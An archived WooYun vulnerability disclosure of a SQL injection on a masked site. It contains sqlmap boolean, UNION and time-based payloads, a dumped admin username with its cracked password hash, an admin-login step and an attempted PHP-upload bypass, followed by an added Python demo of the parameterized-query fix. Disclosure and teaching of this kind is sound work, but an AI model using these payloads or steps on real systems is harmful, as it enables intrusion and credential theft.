WooYun (WooYun.org) historical vulnerability lookup: http://wy.zone.ci/
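2016-01-21: Details reported to the vendor; awaiting vendor handling
2016-01-21: Vendor confirmed; details disclosed to the vendor only
2016-01-31: Details disclosed to core white hats and experts in related fields
2016-02-10: Details disclosed to regular white hats
2016-02-20: Details disclosed to intern white hats
2016-03-05: Details disclosed to the public
Injection point: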
http://**.**.**.**/index.php?do=show&page=3-3&id=2
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: do=show&page=3-3&id=2 AND 6193=6193

    Type: UNION query
    Title: MySQL UNION query (NULL) - 10 columns
    Payload: do=show&page=3-3&id=-2494 UNION SELECT NULL, NULL, NULL, NULL, N, NULL, NULL, NULL, CONCAT(0x3a7373763a,0x504c625179504a455861,0x3a69646c3a),LL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: do=show&page=3-3&id=2 AND SLEEP(5)
---
[15:53:47] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0.11
[15:53:47] [INFO] fetching current user
current user: 'mindmapp@%'
available databases [2]:
[*] information_schema
[*] mindmapping
Database: mindmapping
[21 tables]
+---------------------------------------+
| bz_admin                              |
| bz_case                               |
| bz_client                             |
| bz_config                             |
| bz_ebook                              |
| bz_faq                                |
| bz_news                               |
| bz_rank                               |
| bz_realreport                         |
| bz_sector                             |
| bz_share                              |
| bz_story                              |
| bz_student                            |
| bz_subscribe                          |
| bz_testimonia                         |
| bz_timedate                           |
| bz_timetable                          |
| bz_trainer                            |
| ip2nation                             |
| nation2country                        |
| webstats                              |
+---------------------------------------+

Database: information_schema
[28 tables]
+---------------------------------------+
| CHARACTER_SETS                        |
| COLLATIONS                            |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS                               |
| COLUMN_PRIVILEGES                     |
| ENGINES                               |
| EVENTS                                |
| FILES                                 |
| GLOBAL_STATUS                         |
| GLOBAL_VARIABLES                      |
| KEY_COLUMN_USAGE                      |
| PARTITIONS                            |
| PLUGINS                               |
| PROCESSLIST                           |
| PROFILING                             |
| REFERENTIAL_CONSTRAINTS               |
| ROUTINES                              |
| SCHEMATA                              |
| SCHEMA_PRIVILEGES                     |
| SESSION_STATUS                        |
| SESSION_VARIABLES                     |
| STATISTICS                            |
| TABLES                                |
| TABLE_CONSTRAINTS                     |
| TABLE_PRIVILEGES                      |
| TRIGGERS                              |
| USER_PRIVILEGES                       |
| VIEWS                                 |
+---------------------------------------+
Dumping the admin table:
Database: mindmapping
+----------+---------+
| Table    | Entries |
+----------+---------+
| bz_admin | 1       |
+----------+---------+

Table: bz_admin
[1 entry]
+------------------------------------------+----------+
| password                                 | username |
+------------------------------------------+----------+
| 4e77c53024fe63740d91709c1fd77d7e(780325) | alice    |
+------------------------------------------+----------+
Decrypting the hash gives 780325, which is used to log in to the admin backend:
http://**.**.**.**/admin/
The middleware is Apache and the scripts are PHP, but there are checks everywhere:
http://**.**.**.**/uploadfiles/123dorr.php;_160121.jpg
In the end, the file was never successfully parsed.
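An added example (not from the original report or the affected site's code) showing why the `id` parameter above was injectable and how integer validation plus a bound parameter stops the reported payload types. It assumes SQLite as a stand-in for the MySQL back end and a hypothetical `pages` table; the UNION payload is reduced to two columns with a constructed marker string.

```python
import sqlite3

# Constructed stand-in data: SQLite replaces the page's MySQL back end, and the
# table and column names here are hypothetical, not taken from the target site.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT)")
    db.executemany("INSERT INTO pages VALUES (?, ?)",
                   [(1, "About"), (2, "Courses"), (3, "Contact")])
    return db

def show_vulnerable(db, raw_id):
    # 'Before': the GET value is concatenated into the statement, so any SQL
    # following the number becomes part of the query.
    sql = "SELECT id, title FROM pages WHERE id = " + raw_id
    return db.execute(sql).fetchall()

def show_hardened(db, raw_id):
    # 'After': accept only a short plain-decimal id, then bind it as a
    # parameter so the driver never interprets the value as SQL.
    if not (raw_id.isascii() and raw_id.isdigit()) or len(raw_id) > 9:
        return []  # reject; a real handler would answer 400 or 404
    sql = "SELECT id, title FROM pages WHERE id = ?"
    return db.execute(sql, (int(raw_id),)).fetchall()

# Payload shapes from the sqlmap output above. The false-condition twin and
# the two-column UNION marker are constructed for this demo.
BOOLEAN_TRUE = "2 AND 6193=6193"
BOOLEAN_FALSE = "2 AND 6193=6194"
UNION_MARKER = "-2494 UNION SELECT NULL, 'marker'"

def compare(db):
    # Returns {name: (vulnerable_rows, hardened_rows)} for each input.
    inputs = [("plain", "2"), ("bool_true", BOOLEAN_TRUE),
              ("bool_false", BOOLEAN_FALSE), ("union", UNION_MARKER)]
    return {name: (show_vulnerable(db, v), show_hardened(db, v))
            for name, v in inputs}

if __name__ == "__main__":
    for name, (vuln, safe) in compare(make_db()).items():
        print(f"{name:10} vulnerable={vuln} hardened={safe}")
```

The differing row counts for the true and false conditions are the signal the boolean-based blind test relies on; the hardened handler returns nothing for either, and it rejects the `2 AND SLEEP(5)` form the same way.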
Severity: High
Vulnerability Rank: 18
Confirmed at: 2016-01-21 22:54
Thank you for the report!
None yet